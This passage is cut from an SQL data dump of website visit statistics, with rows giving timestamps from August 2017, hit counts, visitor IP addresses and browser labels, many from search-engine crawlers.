'216.244.66.246','other'),(141351,1501869256,1,1,0,0,'91.196.178.71','chrome'),(141352,1501869474,1,1,0,0,'51.255.65.97','other'),(141353,1501869548,1,1,0,0,'51.255.65.55','other'),(141354,1501869967,1,1,0,0,'217.182.132.97','other'),(141355,1501870112,1,1,0,0,'217.69.133.2','other'),(141356,1501870118,1,1,0,0,'8.29.198.26','other'),(141357,1501870634,1,1,0,0,'217.182.132.156','other'),(141358,1501870788,1,1,0,0,'51.255.65.56','other'),(141359,1501870800,1,1,0,0,'178.92.170.96','chrome'),(141360,1501870910,1,1,0,0,'91.196.178.167','chrome'),(141361,1501871038,1,1,0,0,'137.74.207.109','other'),(141362,1501871546,1,1,0,0,'91.196.178.163','chrome'),(141363,1501871601,1,1,0,0,'51.255.65.19','other'),(141364,1501872384,1,1,0,0,'217.182.132.53','other'),(141365,1501872911,1,1,0,0,'178.92.170.96','chrome'),(141366,1501872948,1,1,0,0,'37.73.208.251','chrome'),(141367,1501873057,2,2,0,0,'216.244.66.246','other'),(141368,1501873976,1,1,0,0,'51.255.65.19','other'),(141369,1501874372,5,5,0,0,'216.244.66.194','other'),(141370,1501874447,1,1,0,0,'91.196.178.67','firefox'),(141371,1501874452,1,1,0,0,'217.182.132.180','other'),(141372,1501874466,1,1,0,0,'31.41.94.90','chrome'),(141373,1501874629,1,1,0,0,'164.132.162.158','other'),(141374,1501875187,1,1,0,0,'51.255.65.43','other'),(141375,1501875247,1,1,0,0,'95.134.116.44','chrome'),(141376,1501875973,1,1,0,0,'137.74.207.110','other'),(141377,1501876416,1,1,0,0,'5.45.207.83','other'),(141378,1501876522,1,1,0,0,'217.182.132.187','other'),(141379,1501877080,1,1,0,0,'51.255.71.113','other'),(141380,1501877300,1,1,0,0,'217.182.132.241','other'),(141381,1501877517,1,1,0,0,'217.182.132.53','other'),(141382,1501877584,1,1,0,0,'217.182.132.185','other'),(141383,1501877655,1,1,0,0,'217.182.132.85','other'),(141384,1501877675,1,1,0,0,'163.172.251.217','chrome'),(141385,1501877757,3,3,0,0,'216.244.66.246','other'),(141386,1501877957,1,1,0,0,'217.69.133.4','other'),(141387,1501877959,1,1,0,0,'217.69.133.5','other'),(141388,1501878016,1,1,0,0,'51.255.65.13','other'),(141389,1501878180,1,1,0,0,'51.255.65.67','other'),(141390,1501878757,1,1,0,0,'137.74.203.194','other'),(141391,1501879091,1,1,0,0,'217.69.133.3','other'),(141392,1501879154,4,4,0,0,'216.244.66.194','other'),(141393,1501879222,1,1,0,0,'66.249.66.157','chrome'),(141394,1501879263,1,1,0,0,'66.249.66.76','chrome'),(141395,1501879712,1,1,0,0,'180.76.15.139','other'),(141396,1501880039,1,1,0,0,'217.182.132.50','other'),(141397,1501880596,1,1,0,0,'95.108.181.52','other'),(141398,1501880622,1,0,1,0,'66.249.66.155',''),(141399,1501880769,1,1,0,0,'216.244.66.246','other'),(141400,1501880803,1,1,0,0,'213.180.203.25','other'),(141401,1501880879,1,1,0,0,'95.108.181.57','other'),(141402,1501880965,1,1,0,0,'8.29.198.27','other'),(141403,1501881012,1,1,0,0,'217.182.132.192','other'),(141404,1501881080,1,1,0,0,'217.182.132.87','other'),(141405,1501881216,1,1,0,0,'37.9.113.128','other'),(141406,1501881705,1,1,0,0,'217.182.132.91','other'),(141407,1501881876,1,1,0,0,'164.132.162.158','other'),(141408,1501881909,1,0,1,0,'66.249.66.157',''),(141409,1501881942,1,1,0,0,'213.180.203.14','other'),(141410,1501882641,1,0,1,0,'66.249.66.155',''),(141411,1501882837,1,1,0,0,'5.45.207.56','other'),(141412,1501882870,1,1,0,0,'51.255.65.42','other'),(141413,1501882927,1,1,0,0,'51.255.65.6','other'),(141414,1501883066,1,0,1,0,'66.249.66.156',''),(141415,1501883361,1,1,0,0,'37.9.113.94','other'),(141416,1501883434,1,1,0,0,'178.154.171.53','other'),(141417,1501883530,1,1,0,0,'217.69.133.203','other'),(141418,1501883624,3,3,0,0,'173.212.216.86','other'),(141419,1501884037,1,1,0,0,'51.255.65.3','other'),(141420,1501884342,4,4,0,0,'216.244.66.246','other'),(141421,1501884734,1,0,1,0,'66.249.66.76',''),(141422,1501884879,9,9,0,0,'216.244.66.194','other'),(141423,1501884894,1,1,0,0,'95.108.181.58','other'),(141424,1501885401,1,1,0,0,'51.255.71.112','other'),(141425,1501885509,1,1,0,0,'91.209.11.236','other'),(141426,1501885553,1,1,0,0,'217.182.132.5','other'),(141427,1501885723,1,1,0,0,'217.182.132.33','other'),(141428,1501885822,1,1,0,0,'217.182.132.31','other'),(141429,1501886752,1,1,0,0,'178.154.171.3','other'),(141430,1501886778,1,1,0,0,'217.69.133.9','other'),(141431,1501886788,1,1,0,0,'91.209.11.236','other'),(141432,1501886952,1,1,0,0,'217.182.132.64','other'),(141433,1501887077,1,1,0,0,'137.74.203.194','other'),(141434,1501887129,1,1,0,0,'37.9.113.94','other'),(141435,1501888026,1,1,0,0,'5.45.207.83','other'),(141436,1501888626,1,1,0,0,'51.255.65.89','other'),(141437,1501888789,1,1,0,0,'91.209.11.236','other'),(141438,1501889228,1,1,0,0,'51.255.71.133','other'),(141439,1501889364,1,0,1,0,'66.249.66.75',''),(141440,1501890151,1,1,0,0,'216.244.66.246','other'),(141441,1501890305,1,1,0,0,'180.76.15.141','other'),(141442,1501890962,8,8,0,0,'216.244.66.194','other'),(141443,1501891140,1,1,0,0,'217.182.132.25','other'),(141444,1501891797,1,1,0,0,'8.29.198.26','other'),(141445,1501892318,1,1,0,0,'217.69.133.203','other'),(141446,1501892471,9,9,0,0,'216.244.66.194','other'),(141447,1501893142,1,1,0,0,'217.182.132.62','other'),(141448,1501893176,1,1,0,0,'217.182.132.86','other'),(141449,1501893430,1,1,0,0,'217.182.132.170','other'),(141450,1501893692,1,1,0,0,'51.255.65.97','other'),(141451,1501894165,1,1,0,0,'217.182.132.66','other'),(141452,1501894411,1,1,0,0,'51.255.65.90','other'),(141453,1501894510,1,1,0,0,'66.249.66.157','chrome'),(141454,1501894600,1,1,0,0,'91.209.11.236','other'),(141455,1501894639,1,1,0,0,'66.249.66.76','chrome'),(141456,1501894667,1,1,0,0,'217.69.133.203','other'),(141457,1501894747,1,1,0,0,'51.255.65.76','other'),(141458,1501894750,3,3,0,0,'66.249.66.155','chrome'),(141459,1501894862,1,1,0,0,'66.249.66.156','chrome'),(141460,1501895745,1,1,0,0,'217.69.133.9','other'),(141461,1501895922,1,1,0,0,'157.55.39.205','other'),(141462,1501896270,3,3,0,0,'216.244.66.246','other'),(141463,1501896349,1,1,0,0,'216.244.66.237','other'),(141464,1501896417,1,1,0,0,'5.45.207.57','other'),(141465,1501896529,1,1,0,0,'51.255.71.119','other'),(141466,1501896724,1,1,0,0,'164.132.162.187','other'),(141467,1501896998,1,1,0,0,'91.209.11.236','other'),(141468,1501897393,1,1,0,0,'51.255.65.53','other'),(141469,1501897477,1,1,0,0,'51.255.65.88','other'),(141470,1501897485,1,1,0,0,'178.154.171.53','other'),(141471,1501897530,1,1,0,0,'137.74.207.102','other'),(141472,1501897814,1,1,0,0,'51.255.65.57','other'),(141473,1501898492,8,8,0,0,'216.244.66.194','other'),(141474,1501898658,1,1,0,0,'217.182.132.148','other'),(141475,1501899191,1,1,0,0,'51.255.65.79','other'),(141476,1501899452,1,1,0,0,'51.255.65.53','other'),(141477,1501899608,1,1,0,0,'217.182.132.178','other'),(141478,1501899726,1,1,0,0,'95.108.181.63','other'),(141479,1501899962,1,1,0,0,'217.182.132.66','other'),(141480,1501900151,5,5,0,0,'216.244.66.246','other'),(141481,1501900167,1,0,1,0,'66.249.66.156',''),(141482,1501900212,1,1,0,0,'164.132.162.159','other'),(141483,1501900953,1,1,0,0,'163.172.251.217','chrome'),(141484,1501901127,1,1,0,0,'217.182.132.151','other'),(141485,1501901130,1,1,0,0,'217.182.132.71','other'),(141486,1501901921,1,1,0,0,'51.255.71.132','other'),(141487,1501902001,1,1,0,0,'91.209.11.236','other'),(141488,1501902097,1,1,0,0,'217.182.132.18','other'),(141489,1501902098,4,4,0,0,'216.244.66.194','other'),(141490,1501902349,1,1,0,0,'51.255.65.83','other'),(141491,1501902629,1,1,0,0,'8.29.198.26','other'),(141492,1501902915,1,1,0,0,'51.255.71.114','other'),(141493,1501903311,1,1,0,0,'66.249.66.157','chrome'),(141494,1501903379,1,1,0,0,'51.255.65.65','other'),(141495,1501903434,1,1,0,0,'217.182.132.30','other'),(141496,1501903773,1,1,0,0,'217.182.132.36','other'),(141497,1501904059,1,1,0,0,'51.255.65.4','other'),(141498,1501904305,1,1,0,0,'213.180.203.42','other'),(141499,1501904322,1,1,0,0,'217.182.132.191','other'),(141500,1501904481,1,1,0,0,'178.92.170.96','chrome'),(141501,1501904915,1,1,0,0,'51.255.65.42','other'),(141502,1501905651,1,1,0,0,'217.182.132.66','other'),(141503,1501905690,1,1,0,0,'37.9.113.138','other'),(141504,1501905938,1,1,0,0,'213.180.203.32','other'),(141505,1501905946,4,4,0,0,'216.244.66.246','other'),(141506,1501906177,1,1,0,0,'217.182.132.50','other'),(141507,1501906712,1,1,0,0,'176.31.231.10','other'),(141508,1501906802,2,2,0,0,'66.249.66.75','chrome'),(141509,1501906829,1,1,0,0,'51.255.71.125','other'),(141510,1501906839,1,1,0,0,'217.69.133.194','other'),(141511,1501907647,1,1,0,0,'217.182.132.179','other'),(141512,1501907682,1,1,0,0,'178.154.171.45','other'),(141513,1501907929,1,1,0,0,'51.255.65.53','other'),(141514,1501908120,1,1,0,0,'213.180.203.42','other'),(141515,1501908323,1,1,0,0,'164.132.162.156','other'),(141516,1501909310,1,1,0,0,'51.255.65.25','other'),(141517,1501909399,1,1,0,0,'216.244.66.237','other'),(141518,1501909501,1,1,0,0,'163.172.251.217','chrome'),(141519,1501909525,4,4,0,0,'216.244.66.194','other'),(141520,1501910217,1,1,0,0,'5.45.207.64','other'),(141521,1501910239,1,1,0,0,'213.180.203.21','other'),(141522,1501910544,1,1,0,0,'51.255.71.116','other'),(141523,1501910548,1,1,0,0,'216.244.66.194','other'),(141524,1501910658,1,1,0,0,'37.55.59.253','other'),(141525,1501911078,2,1,1,0,'66.249.66.155',''),(141526,1501911292,1,1,0,0,'51.255.65.42','other'),(141527,1501911434,1,1,0,0,'213.180.203.18','other'),(141528,1501911543,1,1,0,0,'217.182.132.75','other'),(141529,1501911553,1,1,0,0,'5.45.207.64','other'),(141530,1501911590,8,8,0,0,'216.244.66.246','other'),(141531,1501912873,1,1,0,0,'66.249.66.157','chrome'),(141532,1501913132,1,0,1,0,'68.180.229.59',''),(141533,1501913376,1,1,0,0,'178.154.171.53','other'),(141534,1501913466,1,1,0,0,'8.29.198.26','other'),(141535,1501913665,1,1,0,0,'216.244.66.246','other'),(141536,1501914448,1,1,0,0,'95.108.181.58','other'),(141537,1501914740,3,3,0,0,'216.244.66.194','other'),(141538,1501915524,1,0,1,0,'66.249.66.157',''),(141539,1501915561,1,1,0,0,'217.182.132.91','other'),(141540,1501915659,1,1,0,0,'5.45.207.66','other'),(141541,1501915920,1,1,0,0,'51.255.71.123','other'),(141542,1501916033,1,1,0,0,'178.92.170.96','chrome'),(141543,1501916283,1,1,0,0,'51.255.65.3','other'),(141544,1501916776,1,1,0,0,'66.249.66.156','chrome'),(141545,1501916931,1,1,0,0,'178.154.171.42','other'),(141546,1501916949,1,1,0,0,'137.74.207.116','other'),(141547,1501917072,1,1,0,0,'37.9.113.78','other'),(141548,1501917401,1,1,0,0,'207.46.13.109','other'),(141549,1501917553,1,1,0,0,'217.182.132.60','other'),(141550,1501917812,1,1,0,0,'217.182.132.80','other'),(141551,1501917815,1,1,0,0,'91.196.178.68','firefox'),(141552,1501917944,2,2,0,0,'216.244.66.246','other'),(141553,1501918060,1,1,0,0,'137.74.201.99','other'),(141554,1501918175,1,1,0,0,'178.154.171.72','other'),(141555,1501918791,1,1,0,0,'217.182.132.52','other'),(141556,1501918874,1,1,0,0,'213.180.203.21','other'),(141557,1501919050,8,8,0,0,'216.244.66.246','other'),(141558,1501919326,1,1,0,0,'217.182.132.29','other'),(141559,1501919399,1,1,0,0,'51.255.65.56','other'),(141560,1501919750,1,1,0,0,'95.108.181.69','other'),(141561,1501919886,1,1,0,0,'213.180.203.25','other'),(141562,1501919938,1,1,0,0,'217.182.132.87','other'),(141563,1501920040,1,1,0,0,'217.69.133.6','other'),(141564,1501920066,1,1,0,0,'95.108.181.58','other'),(141565,1501920207,1,1,0,0,'207.46.13.109','other'),(141566,1501920309,1,1,0,0,'66.249.66.155','chrome'),(141567,1501920568,1,1,0,0,'217.182.132.33','other'),(141568,1501920599,1,1,0,0,'51.255.65.83','other'),(141569,1501920922,1,1,0,0,'216.244.66.246','other'),(141570,1501920936,1,1,0,0,'66.249.66.157','chrome'),(141571,1501921545,1,1,0,0,'95.108.181.69','other'),(141572,1501922135,1,1,0,0,'188.166.82.41','chrome'),(141573,1501922423,1,0,1,0,'66.249.66.157',''),(141574,1501922850,1,1,0,0,'217.182.132.81','other'),(141575,1501922972,1,1,0,0,'91.196.178.97','chrome'),(141576,1501922993,1,1,0,0,'207.46.13.109','other'),(141577,1501923146,1,1,0,0,'91.196.178.68','firefox'),(141578,1501923924,1,1,0,0,'207.46.13.99','other'),(141579,1501924252,1,1,0,0,'51.255.71.127','other'),(141580,1501924296,1,1,0,0,'8.29.198.27','other'),(141581,1501924429,1,1,0,0,'51.255.65.79','other'),(141582,1501924435,4,4,0,0,'216.244.66.194','other'),(141583,1501924639,1,1,0,0,'66.249.66.156','chrome'),(141584,1501924692,1,1,0,0,'51.255.71.128','other'),(141585,1501924724,2,2,0,0,'216.244.66.246','other'),(141586,1501924919,1,1,0,0,'180.76.15.134','other'),(141587,1501925133,1,1,0,0,'137.74.207.188','other'),(141588,1501925173,1,1,0,0,'66.102.9.27','chrome'),(141589,1501925336,1,1,0,0,'213.180.203.21','other'),(141590,1501925388,1,1,0,0,'217.182.132.68','other'),(141591,1501925556,1,1,0,0,'216.244.66.194','other'),(141592,1501925863,1,1,0,0,'217.182.132.32','other'),(141593,1501926068,1,1,0,0,'178.154.171.72','other'),(141594,1501926082,1,1,0,0,'5.45.207.57','other'),(141595,1501926137,1,1,0,0,'164.132.162.164','other'),(141596,1501926171,1,1,0,0,'217.69.133.2','other'),(141597,1501927164,1,1,0,0,'178.154.171.42','other'),(141598,1501927588,1,1,0,0,'178.92.170.96','chrome'),(141599,1501927821,1,1,0,0,'213.180.203.32','other'),(141600,1501928044,2,2,0,0,'5.45.207.56','other'),(141601,1501928351,1,1,0,0,'37.9.113.66','other'),(141602,1501928402,1,0,1,0,'66.249.66.157',''),(141603,1501928421,1,1,0,0,'51.255.65.16','other'),(141604,1501929095,1,1,0,0,'217.182.132.84','other'),(141605,1501929151,1,1,0,0,'66.249.66.156','chrome'),(141606,1501929218,1,1,0,0,'66.249.66.155','chrome'),(141607,1501929630,1,1,0,0,'173.208.173.138','other'),(141608,1501929940,1,1,0,0,'37.9.113.138','other'),(141609,1501930179,1,1,0,0,'37.9.113.94','other'),(141610,1501930204,1,1,0,0,'5.45.207.83','other'),(141611,1501931046,3,3,0,0,'216.244.66.246','other'),(141612,1501931192,1,1,0,0,'51.255.65.62','other'),(141613,1501931379,1,1,0,0,'37.9.113.128','other'),(141614,1501931433,1,1,0,0,'81.1.242.33','other'),(141615,1501931638,1,1,0,0,'37.9.113.78','other'),(141616,1501931714,1,1,0,0,'217.182.132.61','other'),(141617,1501931730,2,2,0,0,'95.108.181.58','other'),(141618,1501931775,1,1,0,0,'213.180.203.14','other'),(141619,1501931794,1,1,0,0,'5.45.207.64','other'),(141620,1501932023,1,1,0,0,'217.182.132.176','other'),(141621,1501932053,1,1,0,0,'178.154.171.18','other'),(141622,1501932372,1,1,0,0,'217.182.132.50','other'),(141623,1501932503,1,1,0,0,'176.36.204.85','firefox'),(141624,1501932876,1,1,0,0,'213.180.203.25','other'),(141625,1501932901,1,1,0,0,'217.182.132.171','other'),(141626,1501933067,1,1,0,0,'51.255.71.115','other'),(141627,1501933525,1,1,0,0,'176.31.231.10','other'),(141628,1501933756,1,0,1,0,'66.249.66.155',''),(141629,1501934161,1,1,0,0,'5.45.207.64','other'),(141630,1501934530,2,2,0,0,'216.244.66.194','other'),(141631,1501934798,1,1,0,0,'35.184.189.105','other'),(141632,1501935142,1,1,0,0,'8.29.198.26','other'),(141633,1501935221,1,1,0,0,'51.255.65.82','other'),(141634,1501935344,1,1,0,0,'217.182.132.6','other'),(141635,1501935405,1,1,0,0,'217.182.132.241','other'),(141636,1501935618,1,1,0,0,'217.182.132.188','other'),(141637,1501935870,4,4,0,0,'146.52.120.82','other'),(141638,1501936049,1,0,1,0,'66.249.66.155',''),(141639,1501936207,8,8,0,0,'216.244.66.246','other'),(141640,1501936452,1,1,0,0,'137.74.207.114','other'),(141641,1501936537,1,1,0,0,'178.154.171.42','other'),(141642,1501936609,1,1,0,0,'216.244.66.194','other'),(141643,1501936987,1,1,0,0,'217.182.132.58','other'),(141644,1501937047,1,1,0,0,'51.255.71.115','other'),(141645,1501937264,1,1,0,0,'217.69.133.9','other'),(141646,1501937388,1,1,0,0,'95.108.181.63','other'),(141647,1501937555,1,1,0,0,'51.255.64.106','other'),(141648,1501937627,1,1,0,0,'204.79.180.20','msie'),(141649,1501937788,1,1,0,0,'164.132.162.158','other'),(141650,1501937880,1,1,0,0,'164.132.162.157','other'),(141651,1501938143,1,1,0,0,'51.255.71.131','other'),(141652,1501938272,1,1,0,0,'37.9.113.94','other'),(141653,1501938594,1,1,0,0,'91.209.11.236','other'),(141654,1501938643,1,1,0,0,'217.182.132.56','other'),(141655,1501939096,1,1,0,0,'51.255.71.123','other'),(141656,1501939355,1,1,0,0,'91.196.178.39','chrome'),(141657,1501939534,2,2,0,0,'213.180.203.14','other'),(141658,1501939663,2,2,0,0,'213.180.203.42','other'),(141659,1501940068,1,1,0,0,'217.182.132.193','other'),(141660,1501940070,2,2,0,0,'37.9.113.94','other'),(141661,1501940071,1,1,0,0,'213.180.203.32','other'),(141662,1501940080,1,1,0,0,'178.154.171.53','other'),(141663,1501940087,1,1,0,0,'178.154.171.42','other'),(141664,1501940094,1,1,0,0,'5.45.207.56','other'),(141665,1501940101,1,1,0,0,'95.108.181.57','other'),(141666,1501940655,1,1,0,0,'178.154.171.59','other'),(141667,1501940958,1,1,0,0,'213.180.203.25','other'),(141668,1501941073,1,1,0,0,'95.108.181.52','other'),(141669,1501941077,1,1,0,0,'213.180.203.42','other'),(141670,1501941252,1,1,0,0,'5.45.207.66','other'),(141671,1501941491,1,1,0,0,'95.108.181.63','other'),(141672,1501941495,1,1,0,0,'95.108.181.60','other'),(141673,1501941538,6,6,0,0,'216.244.66.246','other'),(141674,1501941787,1,1,0,0,'51.255.65.22','other'),(141675,1501941866,1,1,0,0,'217.182.132.63','other'),(141676,1501941977,1,1,0,0,'178.154.171.59','other'),(141677,1501942003,1,1,0,0,'37.9.113.138','other'),(141678,1501942597,1,1,0,0,'213.180.203.32','other'),(141679,1501942639,1,1,0,0,'213.180.203.43','other'),(141680,1501942746,1,1,0,0,'51.255.71.101','other'),(141681,1501942784,1,1,0,0,'5.45.207.57','other'),(141682,1501943111,1,1,0,0,'178.154.171.3','other'),(141683,1501943159,1,1,0,0,'217.182.132.76','other'),(141684,1501943224,1,1,0,0,'178.154.171.53','other'),(141685,1501943369,1,1,0,0,'213.180.203.14','other'),(141686,1501943492,1,1,0,0,'217.182.132.59','other'),(141687,1501943765,1,1,0,0,'217.182.132.51','other'),(141688,1501943854,1,1,0,0,'95.108.181.52','other'),(141689,1501943948,1,1,0,0,'178.154.171.59','other'),(141690,1501944042,1,1,0,0,'93.73.12.125','chrome'),(141691,1501944448,1,1,0,0,'216.244.66.237','other'),(141692,1501944490,1,1,0,0,'216.244.66.194','other'),(141693,1501944752,1,1,0,0,'178.154.171.18','other'),(141694,1501944789,1,1,0,0,'37.9.113.78','other'),(141695,1501944968,1,1,0,0,'5.45.207.66','other'),(141696,1501945705,1,1,0,0,'37.9.113.128','other'),(141697,1501945980,1,1,0,0,'8.29.198.27','other'),(141698,1501946217,1,1,0,0,'5.45.207.64','other'),(141699,1501946462,3,3,0,0,'144.76.12.99','other'),(141700,1501946734,1,1,0,0,'217.182.132.55','other'),(141701,1501946915,1,1,0,0,'213.180.203.18','other'),(141702,1501946926,1,1,0,0,'191.101.113.194','chrome'),(141703,1501946933,6,6,0,0,'216.244.66.246','other'),(141704,1501947125,1,1,0,0,'5.45.207.57','other'),(141705,1501947237,1,1,0,0,'173.208.173.138','other'),(141706,1501947348,1,1,0,0,'37.9.113.138','other'),(141707,1501947463,1,1,0,0,'217.182.132.96','other'),(141708,1501947628,1,1,0,0,'51.255.65.70','other'),(141709,1501947979,1,1,0,0,'137.74.201.108','other'),(141710,1501948018,1,1,0,0,'180.76.15.150','other'),(141711,1501948232,1,1,0,0,'51.255.65.8','other'),(141712,1501948377,1,1,0,0,'178.92.170.96','chrome'),(141713,1501948601,1,1,0,0,'213.180.203.21','other'),(141714,1501948737,1,1,0,0,'51.255.65.77','other'),(141715,1501948898,1,1,0,0,'164.132.162.164','other'),(141716,1501948985,1,1,0,0,'178.154.171.42','other'),(141717,1501949034,1,1,0,0,'5.45.207.83','other'),(141718,1501949103,6,6,0,0,'216.244.66.246','other'),(141719,1501949139,1,1,0,0,'217.182.132.76','other'),(141720,1501949246,1,1,0,0,'157.55.39.205','other'),(141721,1501949431,1,1,0,0,'95.108.181.57','other'),(141722,1501949730,1,1,0,0,'51.255.65.35','other'),(141723,1501949847,1,0,1,0,'66.249.66.75',''),(141724,1501949894,1,1,0,0,'217.182.132.97','other'),(141725,1501949972,1,1,0,0,'51.255.65.61','other'),(141726,1501950121,1,1,0,0,'213.180.203.14','other'),(141727,1501950185,1,1,0,0,'66.249.66.157','chrome'),(141728,1501950270,1,1,0,0,'51.255.65.7','other'),(141729,1501950624,1,1,0,0,'178.154.171.42','other'),(141730,1501950793,1,1,0,0,'51.255.65.15','other'),(141731,1501950941,1,1,0,0,'178.154.171.53','other'),(141732,1501951155,1,1,0,0,'95.108.181.63','other'),(141733,1501951164,1,1,0,0,'91.196.178.65','chrome'),(141734,1501951212,1,1,0,0,'5.45.207.56','other'),(141735,1501951294,1,1,0,0,'213.180.203.32','other'),(141736,1501951375,2,2,0,0,'216.244.66.194','other'),(141737,1501951553,1,1,0,0,'178.154.171.42','other'),(141738,1501952437,1,0,1,0,'66.249.66.155',''),(141739,1501952722,1,1,0,0,'178.154.171.53','other'),(141740,1501952728,1,1,0,0,'95.132.31.81','firefox'),(141741,1501952770,1,1,0,0,'37.9.113.78','other'),(141742,1501952869,1,1,0,0,'217.182.132.53','other'),(141743,1501953188,1,1,0,0,'217.69.143.217','firefox'),(141744,1501953429,1,1,0,0,'157.55.39.205','other'),(141745,1501953569,1,1,0,0,'178.154.171.59','other'),(141746,1501953741,1,1,0,0,'5.45.207.64','other'),(141747,1501953755,1,1,0,0,'217.182.132.58','other'),(141748,1501953766,1,1,0,0,'217.182.132.4','other'),(141749,1501954125,1,1,0,0,'213.180.203.43','other'),(141750,1501954239,1,1,0,0,'51.255.65.81','other'),(141751,1501954288,1,1,0,0,'91.124.82.85','chrome'),(141752,1501954480,1,1,0,0,'5.45.207.57','other'),(141753,1501954683,1,1,0,0,'217.182.132.59','other'),(141754,1501955439,7,7,0,0,'216.244.66.194','other'),(141755,1501955738,1,1,0,0,'51.255.65.23','other'),(141756,1501955906,4,4,0,0,'216.244.66.246','other'),(141757,1501956324,1,1,0,0,'51.255.65.18','other'),(141758,1501956813,1,1,0,0,'8.29.198.25','other'),(141759,1501957371,1,1,0,0,'51.255.65.38','other'),(141760,1501957411,1,1,0,0,'66.249.66.155','chrome'),(141761,1501957464,1,1,0,0,'217.182.132.177','other'),(141762,1501957610,1,1,0,0,'217.182.132.170','other'),(141763,1501957847,1,1,0,0,'37.9.113.128','other'),(141764,1501958027,1,1,0,0,'213.180.203.18','other'),(141765,1501958519,1,1,0,0,'51.255.65.82','other'),(141766,1501958647,1,1,0,0,'178.154.171.53','other'),(141767,1501958739,1,1,0,0,'95.108.181.63','other'),(141768,1501958796,1,1,0,0,'217.182.132.148','other'),(141769,1501958829,1,1,0,0,'46.161.9.39','chrome'),(141770,1501959092,1,1,0,0,'213.180.203.21','other'),(141771,1501959113,1,1,0,0,'37.9.113.94','other'),(141772,1501959411,1,1,0,0,'217.69.133.6','other'),(141773,1501959423,1,1,0,0,'37.9.113.138','other'),(141774,1501959470,1,1,0,0,'54.165.59.7','other'),(141775,1501959562,1,1,0,0,'51.255.65.94','other'),(141776,1501959684,1,1,0,0,'66.249.66.156','chrome'),(141777,1501959755,3,3,0,0,'216.244.66.246','other'),(141778,1501959890,1,1,0,0,'51.255.65.28','other'),(141779,1501960009,1,1,0,0,'66.249.66.155','chrome'),(141780,1501960011,1,1,0,0,'207.46.13.109','other'),(141781,1501960075,1,0,1,0,'66.249.66.75',''),(141782,1501960271,1,1,0,0,'37.73.235.27','chrome'),(141783,1501960290,1,1,0,0,'213.180.203.25','other'),(141784,1501960370,1,1,0,0,'217.182.132.190','other'),(141785,1501960599,1,1,0,0,'37.9.113.66','other'),(141786,1501960608,1,1,0,0,'37.9.113.78','other'),(141787,1501961555,1,1,0,0,'213.180.203.32','other'),(141788,1501961692,1,1,0,0,'213.180.203.14','other'),(141789,1501961894,7,7,0,0,'216.244.66.194','other'),(141790,1501961978,1,1,0,0,'137.74.207.101','other'),(141791,1501961985,1,1,0,0,'173.208.173.138','other'),(141792,1501962092,2,0,2,0,'68.180.229.59',''),(141793,1501962425,1,1,0,0,'157.55.39.205','other'),(141794,1501962987,1,1,0,0,'217.182.132.173','other'),(141795,1501963376,1,1,0,0,'51.255.65.61','other'),(141796,1501963835,1,1,0,0,'213.180.203.42','other'),(141797,1501963903,1,1,0,0,'213.180.203.21','other'),(141798,1501964004,1,1,0,0,'137.74.207.102','other'),(141799,1501964121,1,1,0,0,'95.108.181.63','other'),(141800,1501964582,1,1,0,0,'178.154.171.3','other'),(141801,1501964643,1,1,0,0,'95.108.181.58','other'),(141802,1501964708,1,1,0,0,'217.182.132.59','other'),(141803,1501964831,1,1,0,0,'51.255.71.100','other'),(141804,1501965340,1,1,0,0,'137.74.207.120','other'),(141805,1501965737,1,1,0,0,'5.45.207.57','other'),(141806,1501966379,2,2,0,0,'178.154.171.18','other'),(141807,1501966559,1,1,0,0,'5.45.207.64','other'),(141808,1501966671,1,1,0,0,'217.182.132.31','other'),(141809,1501966935,1,1,0,0,'217.69.133.203','other'),(141810,1501967020,1,1,0,0,'95.108.181.58','other'),(141811,1501967162,1,1,0,0,'51.255.65.96','other'),(141812,1501967274,4,4,0,0,'216.244.66.246','other'),(141813,1501967622,1,1,0,0,'66.249.66.157','chrome'),(141814,1501967653,1,1,0,0,'8.29.198.25','other'),(141815,1501967980,1,1,0,0,'217.69.133.9','other'),(141816,1501968059,1,1,0,0,'51.255.65.89','other'),(141817,1501968254,1,1,0,0,'216.244.66.246','other'),(141818,1501969021,1,1,0,0,'164.132.162.187','other'),(141819,1501969043,1,1,0,0,'217.182.132.52','other'),(141820,1501969571,1,1,0,0,'217.182.132.95','other'),(141821,1501969574,1,1,0,0,'5.45.207.64','other'),(141822,1501970072,1,1,0,0,'95.108.181.60','other'),(141823,1501970125,1,1,0,0,'217.182.132.16','other'),(141824,1501970202,1,1,0,0,'46.101.155.131','other'),(141825,1501970388,1,1,0,0,'213.180.203.42','other'),(141826,1501970642,1,1,0,0,'95.108.181.69','other'),(141827,1501970649,2,2,0,0,'216.244.66.246','other'),(141828,1501971105,1,1,0,0,'95.108.181.57','other'),(141829,1501971271,1,1,0,0,'157.55.39.205','other'),(141830,1501971329,1,1,0,0,'217.182.132.32','other'),(141831,1501971749,1,1,0,0,'51.255.65.92','other'),(141832,1501972146,1,1,0,0,'37.9.113.94','other'),(141833,1501972819,8,8,0,0,'216.244.66.194','other'),(141834,1501972856,1,1,0,0,'51.255.65.92','other'),(141835,1501972872,1,1,0,0,'173.208.173.138','other'),(141836,1501973049,1,1,0,0,'213.180.203.42','other'),(141837,1501973435,1,1,0,0,'178.154.171.42','other'),(141838,1501973563,1,1,0,0,'51.255.65.54','other'),(141839,1501974108,1,1,0,0,'66.249.66.156','chrome'),(141840,1501974352,1,1,0,0,'213.180.203.25','other'),(141841,1501974711,1,1,0,0,'213.180.203.14','other'),(141842,1501974845,1,1,0,0,'5.45.207.83','other'),(141843,1501974922,5,5,0,0,'216.244.66.194','other'),(141844,1501975188,1,1,0,0,'5.45.207.66','other'),(141845,1501975192,1,1,0,0,'51.255.65.42','other'),(141846,1501975496,1,1,0,0,'217.182.132.75','other'),(141847,1501975708,1,1,0,0,'216.244.66.246','other'),(141848,1501975888,1,1,0,0,'51.255.71.112','other'),(141849,1501976101,1,1,0,0,'37.9.113.94','other'),(141850,1501976111,1,1,0,0,'217.69.133.5','other'),(141851,1501976305,1,1,0,0,'51.255.65.56','other'),(141852,1501976595,1,1,0,0,'217.182.132.16','other'),(141853,1501977092,1,1,0,0,'217.182.132.190','other'),(141854,1501977462,1,1,0,0,'185.158.150.151','chrome'),(141855,1501977575,1,1,0,0,'51.255.65.36','other'),(141856,1501977692,4,4,0,0,'216.244.66.246','other'),(141857,1501977940,1,1,0,0,'66.249.66.155','chrome'),(141858,1501978142,1,1,0,0,'217.69.133.203','other'),(141859,1501978178,1,1,0,0,'213.180.203.18','other'),(141860,1501978230,1,1,0,0,'164.132.162.160','other'),(141861,1501978376,1,1,0,0,'37.9.113.78','other'),(141862,1501978387,1,1,0,0,'217.182.132.171','other'),(141863,1501978406,8,8,0,0,'216.244.66.194','other'),(141864,1501978493,1,1,0,0,'8.